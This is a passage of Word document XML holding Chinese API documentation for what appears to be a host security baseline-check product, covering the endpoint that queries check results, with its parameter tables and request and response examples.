            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="377FB4E3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>基线规则包含的检查项条数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5CEF84DB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1655865B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>rows</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A101ADC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06E366E8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>检查项明细</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6BC8B6B3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="361" w:name="_Toc115166253"/>
      <w:bookmarkStart w:id="362" w:name="查询检查结果"/>
      <w:bookmarkEnd w:id="360"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>查询检查结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="361"/>
    </w:p>
    <w:p w14:paraId="0E15D582" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76ACA607" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/baseline/spec/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>checkResult</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，win}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586A5786"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173"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1786"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="1C0727C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2AC88A0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3002068B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58C1C09D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4E2DAB85" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="598D7726" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jobId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2320CAB1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C0CB2A1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>本次job id，必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="618606B3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4919EFC6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>checkId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03104C56" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="234D24B5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>检查项的</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>checkId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7FF45817" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DBBF4CA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EAADB92" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>inti</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BB66959" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3159C4E7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BE4659C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="641B0A3B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>inti</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C645D3C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>检查状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="33658792" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BE3A05E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="468C16CE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0753C2D1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="074F7603" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="590EB5FE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2468B5D4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="601456B6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0E6F082A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5498FA24" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jobId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"：本次job id，string 必填</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>checkId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"：检查项的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>checkId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，string</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "group"：业务组，int</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "flag"：检查状态，0-未通过，1通过，-1失败，int</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"：主机</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，string</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "hostname"：主机名，string</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC10A7A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BBA42B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>specId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": xxx,  //任务ID</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ruleId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": xxx,  //规则ID</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "id": "检查结果的id",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>internalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xxxx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exinternalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xxxx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "hostname": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xxxx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>groupName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xxxx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "flag": -1失败, 0未通过,1通过</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "code": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "error": ""，</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "title": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xxxx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "category": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xxxx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "content": "检查内容",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "result": "检查结果",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    // 如果为应用基线为多实例返回，结果以列表形式填充在results中，result为空</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "results" : [ {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "flag" : 0, //检查结果，0：不通过; 1：通过; -1: 检查失败</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "version" : "3.4.10", //版本号</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" : 4222, //PID,进程id</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "port" : 27017, //端口</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "result" : "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mongod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>进程不存在\r\n", //详细结果</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kb_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" : "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mongod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", //应用名</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bin_path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" : "/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/local/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mongodb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mongod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", //运行文件</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>conf_path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" : "/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/local/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mongodb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/conf/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mongodb.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", //配置文件</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "msg" : "错误信息", //错误信息，可能为空， 如"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MySQLNotAuthed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" -&gt; "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>缺少授权信息"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    } ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "description": "描述"，</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "reference": "引用信息",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "level": 0, // 危险级别 Integer</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>remedDes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"："修复建议"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4495C1CA"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362"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1430"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="648B11E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03836C1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="479951D2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FE4B89C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4F2A65B2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="463AFE4C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>specId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="603A7D9A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EF16E89" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>任务id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0AC3C26F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="288C3508" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ruleId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25DB45CE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6811B7C4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>规则ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2F0C3F87" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1306C2D7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="056D7386" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52F57EBF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>检查结果的id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0587A087" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03EDE53B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="587FAAF9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34CF088C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3CB50F18" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F262153" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>exinternalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34D95587" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
